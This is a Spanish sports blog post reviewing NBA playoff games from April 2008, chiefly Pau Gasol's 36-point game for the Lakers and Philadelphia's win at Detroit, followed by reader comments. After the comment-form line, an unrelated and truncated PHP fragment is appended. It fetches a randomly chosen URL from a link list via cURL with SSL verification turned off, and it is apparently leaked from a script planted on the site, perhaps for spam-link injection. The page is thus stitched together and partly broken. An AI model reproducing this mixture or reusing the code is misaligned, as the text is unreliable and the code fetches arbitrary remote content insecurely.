Que no decaiga

21 de April de 2008 por TheDeerHunter

Por TheDeerHunter y Viva_Dirk

Si la primera jornada de los Playoffs nos dejó ya muchas emociones, ésta segunda, con la derrota de Detroit y el partidazo de Gasol entre otros asuntos, no se ha quedado ni mucho menos atrás.

Pau Gasol acudió a la cita (DEN 114 – LAL 128)

Los Lakers ganaron su primer partido de Playoffs a pesar de la actuación de Kobe Bryant que, aunque parezca increíble, completó un muy mal partido maquillado tan solo al final del último cuarto a base de tiros libres. En ausencia de la estrella del equipo, Pau Gasol y Lamar Odom se hicieron cargo de las operaciones y el resultado no puedo ser más devastador para los Nuggets. El español ganó su primer partido de Playoffs de su carrera y lo hizo de una manera casi perfecta, como atestiguan los 36 puntos, 16 rebotes, 8 asistencias y 3 tapones con los que acabó el choque. Se trata sin duda de una estadística brutal. Además, su compenetración con Odom fue absoluta (ese Odom to Gasol se convertirá en un clásico), y el juego del ala-pívot de los Lakers devolvió el dinero de la entrada a los espectadores del Staples. Jugó con descaro, penetrando sin cesar, reboteando ferozmente y ejerciendo de organizador del juego con alguna asistencia sublime. Además del dúo Gasol&Odom, también merece mención Luke Walton que completó una gran primera parte aportando claridad de ideas y una defensa decente sobre Carmelo.

Los Nuggets ya sabemos cómo son, anárquicos por naturaleza. Sus dos estrellas (Iverson y Melo) hicieron un mejor partido que Bryant, pero por poco, ya que también aprovecharon para maquillar sus números cuando Denver iba 15 abajo en el marcador. El juego interior estuvo desastroso en ataque con 3 de 16 en tiros y no tuvieron nada que hacer en defensa ante la avalancha Gasol&Odom. La defensa de Kenyon Martin sobre Kobe y el juego ofensivo de JR Smith y Kleiza son las mejores noticias para George Karl.

No parece que los angelinos deban tener problemas para pasar la eliminatoria si defienden mínimamente y no permiten canastas fáciles a Denver, que sólo puede hacer daño a base de rachas y oleadas de talento. De cara a próximos encuentros será importante que Farmar coja la confianza que ha tenido durante toda la temporada y se olvide del espantoso partido que hizo ayer, porque Turiaf, si Odom y Gasol juegan siempre así, puede dedicarse a dar saltos y poner caras desde el banquillo.

Sorpresa en Auburn Hills (PHI 90 – DET 86)

Hay varios equipos que, en los últimos años, se han caracterizado por ser capaces de despertar su verdadero juego en los momentos clave de la temporada. Sin hacer demasiados alardes en temporada regular siempre han sido capaces de llegar bien posicionados a la lucha por el título y es entonces cuando han sido capaces de mostrar un nivel superior de juego. Tradicionalmente han sido equipos muy cohesionados, muy experimentados y con una extraordinaria confianza en sus posibilidades. Siempre pensamos que San Antonio, Detroit… comienzan la temporada exclusivamente en estas fechas y que lo que ha habido detrás es poco menos que una larga y tediosa preparación para ellos.

El caso es que otra característica de estos equipos, causa y consecuencia de esa experiencia y cohesión que poseen, es el círculo casi cerrado de elementos clave de su juego, con una rotación bastante limitada y de jugadores ya de una cierta edad que en parte ya están a la vuelta de todo pero que siempre han mostrado una inquebrantable competitividad a pesar de ello. La vieja guardia pretoriana de Detroit.

Enfrente, en esta ocasión, nos encontramos un equipo completamente joven, cargadísimo de ilusión y sin nada que perder por lo que se esperaba de ellos. Un equipo físicamente espectacular con chavales que no se cansan de corretear, saltar y pegarse en cada palmo de la cancha y que son capaces de descontrolar el ritmo incluso de equipos tan preparados para que eso no suceda. En este caso también cuentan con un constructor de juego efectivo, que distribuye con pasmosa inteligencia el desorden que los demás crean y además cuentan con algún que otro jugador perro y duro como él sólo que pueden ser capaces de aportar solidez defensiva a un equipo que por sus características podría no tenerla. Resulta inevitable, aunque con matices por el estilo de juego de ambos contendientes, la similitud con el “We believe” del año pasado. ¿Es posible que Detroit se haya encontrado con su antítesis? ¿con la horma de su zapato?

Es probable que lo de anoche fuera un accidente. A pesar de los buenos partidos que este año han logrado los Sixers del post-Iverson contra Detroit nadie contaba seriamente con que pudieran ponérselo difícil a los viejos Pistons. Se puede pensar que lo creían demasiado fácil para ponerse a velocidad crucero/playoffs en estos momentos y puede que sea así, pero lo cierto es que anoche la defensa asfixiante que caracteriza a los Pistons la puso Philadelphia.

El prestigioso quinteto de los Pistons, que tantas alegrías les ha dado, se quedó apenas en un 30% de tiros y Rasheed Wallace fue el único capaz de anotar con cierta soltura, pero con no demasiada eficacia. Después de eso, tampoco es que se pueda encontrar demasiado en el banquillo que pudiera cambiar la tendencia y ese factor, intrínseco a la filosofía de los Pistons en los últimos años, ahora mismo puede pasarles factura.

Adicionalmente a todo lo dicho, habría que destacar por parte de Philadelphia, además de la habitual inteligente dirección de André Miller y la intensidad de los jóvenes, la aportación del viejo gladiador Reggie Evans, máximo reboteador del partido saliendo desde el banquillo.

Un partido sin historia (ATL 81 – BOS 104)

Como era de prever, victoria fácil de los Celtics. Todo puede resumirse en un acierto del 46,9% en tiros de campo y un 56,3% de triples de los Verdes, frente a 38,2% y un pobre 3 de 14 en triples de los Hawks. Demasiado fácil… intensidad en defensa y plácido ataque, sin mucho desgaste para los titulares. Por Atlanta, un sólido Horford no pudo hacer mucho para ganar. Junto a Joe Johnson pudieron mantenerse a duras penas vivos al final de la primera parte pero con el pésimo partido de Bibby, Josh Smith y Marvin Williams no se puede contra Boston.

Toronto empieza como acabó (TOR 100 – ORL 117)

Los Raptors empezaron su fiesta en Playoffs como han terminado la temporada: como la chata. Perdiendo por 20 nada más comenzar con una defensa absolutamente predecible contra Dwight Howard que los tiradores de Orlando supieron aprovechar y con una dirección una vez más lamentable de TJ Ford. Y así, pasó lo que tenía que pasar.

Es curioso lo de este equipo; según se decía, posee la mejor pareja de bases de la liga. ¿Cómo es posible gestionar tan mal esta situación como para convertir una virtud en su principal problema? Es fácil si en él hay involucrados jugadores inmaduros e insolidarios (por no decir descerebrados). Por otro lado, Calderón tampoco ha sido capaz de asimilar su situación y el equipo lo nota, aunque con él en la pista siguen dando sus únicas señales de esperanza. Ayer por lo visto jugó con molestias en el cuello, aunque huele a excusas. Y, a todo esto, Bargnani sigue dando muestras muy preocupantes del nivel real de su juego. Que se lo haga mirar por favor…

Por Orlando, ninguna señal de desgaste en su Superman particular. Partido bestial, el suyo. El equipo supo jugar sus cartas muy bien a excepción de Rashard Lewis, que no sabemos cuando va a mostrarse… o si llegará a mostrarse. Teniéndolo a él, este equipo podría hacer algo gordo, pero no se adivina tampoco que eso pueda suceder.

Y si habéis llegado hasta aquí os merecéis el vídeo con las mejores jugadas del día:

Y otro resumiendo la fenomenal actuación de Pau:

Comenta

8 comentarios a esta entrada

  1. Gallis dice:
    #1

    Por partes…

    Partidazo soberbio de Gasol, pero para mi el catalizador de todo fue Odom. El equipo se movió al ritmo que marcó él, Gasol le debe muchos de sus puntos y además en defensa estuvo magnífico. De hecho, el amago de remontada de Denver en el último cuarto fue con él en el banco y se abortó en cuanto saltó de nuevo a la pista…Este Odom sí!!!

    Ah! para mi los Lakers harán muy mal si ganan esta eliminatoria sin defender. Como comentáis en el caso de los Pistons, no siempre es tan fácil pasar del modo relax al modo intensidad defensiva y una serie tan “placida”(entiendaseme bien) es ideal para coger un buen ritmo defensivo. Si lo hacen, los partidos durarán 3 cuartos o menos, la serie será comoda y el equipo llegará embalado a la siguiente ronda…si no lo hacen, pasaremos igual, pero en segunda ronda nos la podemos dar contra un muro…

    Lo de Boston es lo que hay, nada nuevo bajo el sol, jeje…

    Sobre lo de los Pistons, muy bueno eso de la guardia pretoriana, jeje. Sin embargo, yo sería prudente sobre lo del fin de un ciclo. Ya se dijo el año pasado cuando los Spurs perdieron en casa contra los Nuggets el primer partido, y todos sabemos el final…habrá que ver como reaccionan los Pistons, aunque creo que la prueba del algodón estará en Philadelphia…eso sí, las señales que envían al resto de favoritos, sobre todo a los Celtics, no son buenas.

    Y sobre los Raptors, es cierto, han convertido su principal virtud en el principal causante de la descomposición del equipo…y la papeleta de este verano es de aúpa. Muy mala la sensación que dejaron ayer. Sin hacer nada del otro jueves (lo de Howard es “habitual”, jeje), se los merendaron…

    Por cierto, los 43 puntos de Orlando en el primer cuarto son la mayor anotación de la historia de la NBA en un cuarto de Playoff, jojojojo…

      Citar

  2. MagicJohnson32 dice:
    #2

    El primer cuarto de Orlando fue un escándalo. 9 triples metieron, qué barbaridad.

    Sobre los Lakers, Phil ya ha dicho que hay que mejorar la defensa. Pero hombre, si haces casi 130 puntos, es normal que te hagan 114. A mí en general me gustó la actitud defensiva, salvo en momentos muy concretos. Pinta muy bien para LAL, que creo que además de ganar consiguió lo que buscaba: que Gasol y Odom rindan al 100%.

    Como a Gallis, el partido de Odom me pareció soberbio. Hay veces que el hombre sufre jugando, jeje, pero ayer fue uno de esos días en los que disfruta y hace disfrutar.

      Citar

  3. TheDeerHunter dice:
    #3

    Lo de Odom no es flor de un día.
    Lleva así prácticamente todos los partidos desde que ha llegado Gasol. Ha encontrado su lugar por fin y es de una importancia vital para el equipo.
    Puede decirse que cobra demasiado para ser un jugador de intendencia. Puede ser… pero es una intendencia que puede darte el anillo.
    Lo que tengo claro es que en estos momentos prefiero tener sano a Odom que a Bynum, es el catalizador del juego y para mí en él está la gran esperanza de los Lakers por el título.

    Sobre Detroit, creo como vosotros que ha sido un accidente. Tengo (quizá) demasiada fé en el carácter ganador de ese equipo pero también creo que Philadelphia tiene todos los ingredientes para poder dar la sorpresa. Lo peor para Detroit es que es como si fuera un hermano pequeño suyo… y tienen armas muy parecidas a las de ellos. La defensa de Philly por momentos me impactó, os lo aseguro.

    A pesar del partidazo de Gasol creo que la estrella de la primera jornada es para Duncan. Su partido, sin menospreciar a Camby (jurl, jurl, jurl) era mucho más exigente que el de Gasol. No sólo prevaleció sino que hizo una actuación de leyenda, y ya van unas cuantas.

    Para el premio “mayor paquete” de la jornada… hay varios candidatos: Se habla de TJ Ford, Bargnani, Bibby, Rip Hamilton, Josh Howard, McGrady…
    A Desawn no lo incluímos porque el chaval ya sabemos que no da pa más…

    Por cierto… Radmanovic, curiosamente, no está en la lista. ¿algo está cambiando??

      Citar

  4. telekoman dice:
    #4

    Evidentemente, lo de Detroit ha sido un accidente, pero creo que un accidente bastante previsible. En todos los análisis tanto de pretemporada como durante la temporada se planteaba un escenario en el que los suplentes deberían dar un paso adelante mucho más importante de lo que realmente han dado. El caso más evidente es el de Stuckey, que se presentaba como una opción de recambio importante de Billups y Hamilton y con la lesión de la muñeca se ha quedado a medio camino. Del resto, tan sólo Maxiel parece estar dando un poco la cara. Si es problema de los suplentes o del entrenador ya es más dificil de ver. Creo que se ganará a Philadelphia, pero con un coste físico importante, me temo.

    De los Lakers, hay poco que decir. Gasol muy bien, quitándose la presión. Odom también muy bien en el papel que lleva adoptando desde que llegó Gasol, mucho rebote, mucha asistencia. Y Kobe bastante mal, con porcentajes muy malo. Me crea dudas Kobe, aunque parezca mentira. En especial su actitud. Eso de querer tirarse hasta las zapatillas, cuando por fin tiene otros compañeros que están mejor…… El ego, que viene el ego.

      Citar

  5. TheDeerHunter dice:
    #5

    No voy a justificar a Kobe a estas alturas… creo que todos ya lo conocemos plenamente para lo bueno y para lo malo.
    Para mí, lo de Kobe anoche fue incluso más accidente que lo de Detroit.

    A Kobe lo ví sobreactuado, sobrepresionado. Creo que ni él mismo se esperaba quedar sobrepasado por la ansiedad del querer agradar por encima de otros jugadores competentes, situación que no ha vivido nunca desde la marcha de Shaq.
    El manejo de la tensión, de la competitividad es una de las cartas con las que se juega. La presión por hacerlo bien y la ansiedad por ganar o ganar puede tumbar al más pintado… y durante la primera parte Denver también intentó poner lo suyo para defenderle supongo que no se esperaban lograrlo tan bien ni tampoco la destroza que el eléctrico juego de pase de Lakers supuso para su débil sistema defensivo.
    Estoy seguro que en próximo partido volveremos a ver a un Kobe más inteligente que anoche.

      Citar

  6. txusma dice:
    #6

    Tal vez en Detroit no han dejado dar un paso importante a sus suplentes. Stuckey, Maxiell, Amir, Affalo, Hermaan, creo q son una intendencia que puede dar frutos, pero que no ha disfrutado durante la temporada de los minutos necesarios para engrasarse (a excepcion tal vez de Maxiell). No puedes ahora exigirles q te saquen las castañas del fuego. Creo q este es el gran pero de los Pistons, q tan solo juegan 5 o 6.

      Citar

  7. MagicJohnson32 dice:
    #7

    A mí Saunders me parece un bluf total como entrenador.

    Y a mí Kobe no me dio esa impresión. Al revés. Aunque al final hizo muchos tiros no acaparó demasiado y jugó con intensidad, una de las cosas de las que suele adolecer el equipo en ocasiones. Estuvo mal, evidentemente, pero vamos, me preocuparé de muchas cosas y Kobe no es una de ellas.

      Citar

  8. Gallis dice:
    #8

    Exacto, mira que hay cosas en LA para preocuparse (defensa, Odom, banquillo, lesiones), como para perder el tiempo preocupandote por lo mejor que tenemos, jeje…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>